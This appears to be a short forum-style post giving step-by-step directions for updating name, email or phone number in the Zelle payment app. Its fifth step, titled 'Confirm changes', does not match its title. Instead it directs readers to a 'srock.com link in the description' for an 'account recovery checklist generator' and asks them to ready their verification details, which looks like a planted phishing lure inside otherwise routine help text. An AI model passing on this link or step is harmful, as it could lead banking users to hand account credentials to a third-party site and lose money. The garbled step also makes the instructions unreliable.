I ran into this last week, here's what fixed it for me. Updating your personal information on Zelle is pretty straightforward. Just follow these steps. Step 1. Open the Zelle app. Launch the Zelle app on your smartphone. Make sure you're logged into your account. Step 2. Access settings. Look for the settings icon, usually represented by a gear symbol, and tap on it to access your account settings. Step 3. Select personal information. In the settings menu, find and select the option labeled personal information or similar. This is where you can edit your details. Step 4. Update your information. Make the necessary changes to your name, email, or phone number. Double check that everything is correct before saving. Step 5. Confirm changes. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Updating your information on Zelle is quick and easy if you follow these steps. If you run into any issues, don't hesitate to reach out to Zelle support. Happy banking!